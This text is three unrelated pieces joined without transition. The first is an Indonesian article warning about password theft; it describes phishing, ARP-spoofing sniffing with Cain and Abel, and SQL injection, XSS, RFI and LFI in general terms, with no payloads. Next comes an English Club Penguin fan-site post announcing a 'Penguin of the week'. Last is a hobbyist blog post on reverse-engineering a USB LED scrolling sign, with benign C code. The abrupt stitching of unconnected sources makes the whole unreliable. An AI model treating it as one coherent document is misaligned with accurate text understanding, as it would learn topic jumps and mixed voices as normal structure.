Mungkin anda berfikir orang yang menggunakan komputer pribadi terhindar dari kasus pencurian password. Sangat dipastikan pikiran anda salah besar karena orang yang menggunakan internet rumahan sekalipun tak luput dari tindak kejahatan cyber. Dari sekian banyak cara ada satu cara yang paling mudah, yaitu Phising. Phising ialah teknik yang menggunakan pesan palsu yang akan membawa anda pada suatu link yang dimana link tersebut merupakan fake login dari suatu web yang anda sendiri ialah salah satu membernya. Misalnya anda mendapat email dari Bank anda dan diminta untuk Log in ke situs bank tersebut karena suatu hal, untuk mempermudah anda si pengirim telah memberikan link supaya anda dapat dengan mudah menuju situs bank tersebut, Link tersebut terlihat tidak mencurigakan karena bertuliskan nama bank anda dengan bernar, namun ketika anda mengklik link tersebut anda akan di bawa ke halaman situs yang sama persis dengan halaman situs bank tersebut yang membedakan hanya URL di address bar yang mungkin hanya berbeda satu huruf saja dengan situs aslinya, bagi pengguna awam atau mereka yang tidak pandai menggunakan teknologi tentu saja akan terpancing (itu kenapa dinamai Phising) dan memasukkan username dan password pada situs palsu tersebut tanpa rasa curiga sedikitpun.

SNIFFING
Mereka yang memakai komputer pribadi bisa bernafas lega sekarang karena mereka tak perlu takut dengan yang namanya Sniffing, Sniffing atau mengendus data hanya dapat dilakukan pada komputer yang terhubung jaringan, misalkan di sebuah jaringan ada 5 komputer, 1 komputer server dan selebihnya komputer client, posisikan anda di komputer client-01 lalu hacker di komputer client-02, disini anda akan menjadi korban si hacker yang berada di sebelah anda. Misalkan anda memasuki situs bank anda, lalu mengisikan username/email dan password ke kotak login dan mengirimkan ke komputer server tempat situs bank tersebut bernaung, tetapi perjalanan menuju server tidak secara langsung tetapi melalui gateway, ISP dan baru dikirim ke server, di sinilah sang hacker beraksi, melalui jaringan yang sama, si hacker menipu komputer korban agar percaya bahwa mac addres komputer gateway adalah mac addres komputer yang hacker pakai. Maka setiap data (termasuk username dan password) harus melewati si gateway palsu (client-02 <= komputer hacker). Teknik ini juga berlaku pada jaringan Hotspot. Lalu apakah menurut anda pelaku kejahatan ini sedikit karena terlihat susah dalam pengerjaannya, anda salah besar, ratusan blog dan forum telah membahas teknik ini sejak lama, programnya pun bersifat free dan dapat di download siapapun tanpa persyaratan, begiu juga tutorialnya, mudah saja mendapatkannya, hanya search di google “teknik sniffing cain abel” maka anda akan mendapatkan apa yang anda inginkan. Cain and Abel? Ya, itulah nama salah satu softwarenya, ini adalah mainan bagi mereka yang baru mengerti hacking karena tidak sulit dalam pengaplikasiannya.

SERVER ATTACK
Penyerangan langsung terhadap server, ini mungkin suatu yang lebih sulit daripada teknik-teknik yang telah dibahas, penyerangan Server dapat dilakukan dengan berbagi cara, diantaranya SQL Injection, XSS, RFI, LFI. SQL Injection bersifat melihat isi dari database situs, XSS memasang scipt pada kotak komentar, jika situs tersebut vuln(mudah di hack karena sistem keamanan yang seadanya) maka script yang seharusnya tidak di eksekusi malah dieksekusi karena sistem tidak dapat membedakan mana yang input client dengan script sistem, setahu penulis sampai sekarang metode ini tidak mampu melihat database situs tapi berpotensi mencuri data dengan menyisipkan script directing, dengan script setiap pengunjung yang melihat halaman home akan dibawa ke login palsu(fakelogin). Jika yang mendirect kita berasal dari home situs asli pastilah tidak mencurigakan, inilah bahayanya. RFI dan LFI juga bersifat sama dengan SQL Injection yaitu melihat database situs. Jika si hacker mencoba SQL Injection dan ternyata berhasil, user pun tak dapat berbuat banyak, hanya mengganti password yang dapat dilakukan user itupun jika dia mengetahui bahwa situs tersebut telah di hack. Bagi hacker yang berhasil memasuki komputer server akan mendapat banyak keuntungan, salah satunya untuk menyebar virus atau trojan buatannya. Server Attack relatif mudah dilakukan. Lagi-lagi karena internet yang telah menyebarkan teknik ini secara Global. Namun cara ini terlalu berisiko karena jika ketahuan telah terjadi perampokan account pada server maka operator server dapat melaporkan kepada polisi di negara tempat dia berada untuk ditangani, bisa jadi hacker-hacker muda ini didatangi oleh FBI walau mereka berbeda negara sekalipun. Mungkin saja.

Masih banyak cara untuk mencuri password yang bertebaran diinternet namun hanya ini yang saya bisa berikan, jika ada cara yang lebih praktis lagi akan saya update nanti.

Berbagai teknik bisa saja dicegah, tentu saja mengucapkan lebih mudah dari pada melakukannya, untuk menghindari kejahatan cyber perlu adanya biaya, tenaga ahli, dan persetujuan dari pihak-pihak terkait, inilah masalahnya, banyak pengguna lebih menginginkan Kenyamanan dari pada Keamanan. Sehingga bagaikan buah simalakama bagipenyedia layanan, jika mereka meninggkatkan keaman, maka banyak user mengeluh karena mereka selalu di todong dengan pertanyaan-pertanyaan yang bersifat security setiap kali mengakses suatu konten dan harus login berkali-kali karena batas sesi yang pendek. Namun jika penyedia tersebut meningkatkan kenyamanan maka akan banyak pula user yang mengeluh karena tak dapat mengakses account mereka karena telah di hack. Huh.. andaikan Kenyamanan dapat berjalan seirama dengan keamanan mungkin akan lain ceritanya.
Tujuan dari artikel ini bukan membuat anda panik atau paranoid. Tapi hanya menghimbau agar anda tetap waspada walau dilingkungan dunia maya sekalipun. Mungkin anda salah satu dari orang yang berfikir bahwa jika account anda di hack itu tak akan merugikan anda sama sekali karena di dalam anda tidak data-data yang penting untuk diambil. Maka segeralah buang jauh-jauh pikiran tersebut. Karena account anda dapat di salah gunakan oleh hacker, misalnya si hacker menyebar pesan palsu kepada setiap teman anda yang ada di address book email anda lalu salah seorang yang dikirimi email sadar bahwa email tersebut palsu dan pastilah anda yang akan kena batunya. Tentu dapat merusak nama baik dan karir anda. Yang parahnya lagi jika anda mempunyai email yang itu-itu saja tanpa mengganti password sejak bertahun-tahun yang lalu, bisa saja saat anda dihack anda tidak mempunyai account di bank manapun ataupun account Paypal, tapi di tahun –tahun kemudian saat anda telah bekerja pastilah anda sudah mempunyai rekening bank. Dan hacker dapat menguras habis uang anda dalam waktu singkat hanya karena anda tidak pernah mengganti password dari email lama anda. Mungkin mengganti password secara rutin cukup merepotkan bagi anda, tapi cobalah untuk selalu menggantinya walaupun sulit untuk terus menghafalnya, karena setidaknya hanya itulah cara terbaik bagi anda yang tidak mau passwordnya dibajak oleh orang lain

Hey everyone I’m starting something new its called Penguin of the week. I will be choosing one person each week to be Penguin of the week! Ways you can become Penguin of the week: Commenting on the posts (Positive Comments =]) Donating to the new page marked as ‘Donations’. Bringing your friends to see my website. Coming to chat with me and my friends at http://xat.com/kfpm as much as you can! Following me on twitter. For the first few weeks I will be choosing random followers from twitter. So you have a great chance at becoming Penguin of the Week if you follow me on twitter at http://twitter.com/kfpmcp . The Penguin of the week will be advertised in every post until the next penguin is chosen the next week. Hope to see YOU as penguin as the week! Waddle On Penguins!

~KFPM Main~

For some reason I always pick up these dumb scrolling message things at Fry’s, first one had an embedded uC that Furan had hacked by RE’ing the wires and installing a new uC, this one has USB but doesn’t work without the program running on the Host PC….

So lets hack it..

First thing is that it is a USB HID , so that is fairly straightforward. HID Write comes into play here. Jan Axelson is pretty much the standard for USB/serial etc http://www.lvr.com/hidpage.htm

A quick poke around the bytes look like, brightness, location, data. 0xFF is all off, 0×00 all on. right most byte is left most on the display at 0×00 0×00 0xFF 0xFF 0xFF 0xFF 0×00

First byte is brightness

Second byte is vertical row 0×5 is the bottom, two lines are written at once. If you give it 0×6 it’ll write the first line to the last row, then wrap after a few that disappear.

It takes 0×9 message length, and no read back.

That’s it on the hardware side really!

Using usbhido_vc6 as an example, all you have to do is FindHid() with the VID/PID set, and then do

I just threw in some junk code to show it working

 

if( MyDeviceDetected ) {

    // always
    OutputReport[0 ] = 0×0;

    // brightness 0 .. 15
    OutputReport[1 ] = 15;

    OutputReport[2 ] = row;

    row+=2;

    row%=8;

    // fill in some random data
    for( int i= 3 ; i < 10 ;i ++ ) {
        OutputReport[i]++;;
    }

    if (WriteHandle != INVALID_HANDLE_VALUE)
    {
        HRESULT Result = HidD_SetOutputReport
            (WriteHandle,
            OutputReport,
            9); // fixed length (comes from device report)
    }
}

It’s trivial to treat the output as a frame buffer, 21×7

so the header of the OutputReport[] looks like

offset 0, always 00
offset 1, brightness, 0-15
offset 2, row *2

then the remaining bytes are

offset 3,   0×00 – right hand side 5 LEDS on
offset 4,   0×00 – middle 8 LEDS all on
offset 5,   0×00 – left 8 LEDS all on

offset 6,   0×00 – right hand side 5 leds on , second row
offset 7,   0×00 – middle 8 LEDS all on, second row
offset 8,   0×00 – left 8 LEDS all on, second row

0xfe in an 8 LED cell, would mean the leftmost LED was ON and the others off

0xaa would be ON,OFF,ON,OFF,ON,OFF since the leds are reversed, since 1 is LED off.

a quick #define in c for the 5 LED’s

#define LED_5(a,b,c,d,e) ( (!e<<4) + (!d<<3) + (!c<<2) + (!b<<1) + (!a) )

The 8’s

#define LED_8(a,b,c,d,e,f,g,h) ( (!h<<7) + (!g<<6) + (!f<<5) + (!e<<4) + (!d<<3) + (!c<<2) + (!b<<1) + (!a) )

You can use the 8 macro for the 5 LEDs, since it ignores the top ones, so LED_8(1,1,1,1,1,0,0,0) is equivalent to LED_5(1,1,1,1,1)

One whole row, left to right would be

OutputReport[5] = LED_8(1,1,1,1 ,1,1,1,1) ;
OutputReport[4] = LED_8(1,1,1,1, 1,1,1,1) ;
OutputReport[3] = LED_8(1,1,1,1 ,1,0,0,0) ;

And some equally hacky code just to see if the above all works in principle.

 

#define LED_8(a,b,c,d,e,f,g,h) ( (!h<<7) + (!g<<6) + (!f<<5) + (!e<<4) + (!d<<3) + (!c<<2) + (!b<<1) + (!a) )

#define FB(x) (framebuffer[x + (y*21)]?1:0)

#define _ 0
#define W 1

unsigned char framebuffer[21 * 7] = {
   W, _, W, _, W, W, _, W, _, _, W, _, _, W, W, W, _, W, _, W, _,
   W, _, W, _, W, _, _, W, _, _, W, _, _, W, _, W, _, W, _, W, _,
   W, _, W, _, W, _, _, W, _, _, W, _, _, W, _, W, _, W, _, W, _,
   W, W, W, _, W, W, _, W, _, _, W, _, _, W, _, W, _, W, _, W, _,
   W, _, W, _, W, _, _, W, _, _, W, _, _, W, _, W, _, W, _, W, _,
   W, _, W, _, W, _, _, W, _, _, W, _, _, W, _, W, _, _, _, _, _,
   W, _, W, _, W, W, _, W, W, _, W, W, _, W, W, W, _, W, _, W, _
};
#undef _
#undef W

void CCreamDeekyDlg::OnTimer(UINT_PTR nIDEvent)
{
    int y;

    CDialog::OnTimer(nIDEvent);

    if( MyDeviceDetected ) {

        for( y = 0 ; y < 7 ; y++ ) {

            // always
            OutputReport[0 ] = 0×0;

            // brightness 0 .. 15
            OutputReport[1 ] = 1;

            OutputReport[2 ] = y;

            OutputReport[5] = LED_8(FB( 0),FB( 1),FB( 2),FB( 3),FB( 4),FB( 5),FB( 6),FB( 7));
            OutputReport[4] = LED_8(FB( 8),FB( 9),FB(10),FB(11),FB(12),FB(13),FB(14),FB(15));
            OutputReport[3] = LED_8(FB(16),FB(17),FB(18),FB(19),FB(20),0,0,0);

            y++;
            OutputReport[8] = LED_8(FB( 0),FB( 1),FB( 2),FB( 3),FB( 4),FB( 5),FB( 6),FB( 7));
            OutputReport[7] = LED_8(FB( 8),FB( 9),FB(10),FB(11),FB(12),FB(13),FB(14),FB(15));
            OutputReport[6] = LED_8(FB(16),FB(17),FB(18),FB(19),FB(20),0,0,0);

            if (WriteHandle != INVALID_HANDLE_VALUE)
            {
                HRESULT Result = HidD_SetOutputReport
                    (WriteHandle,
                    OutputReport,
                    9);
            }
        }
    }
}

and it does , that’s brightness level 1, but its an iPhone..

Next i think i’ll see if i can implement per LED brightness, I’m hoping POV will let me write multiple times on the same row.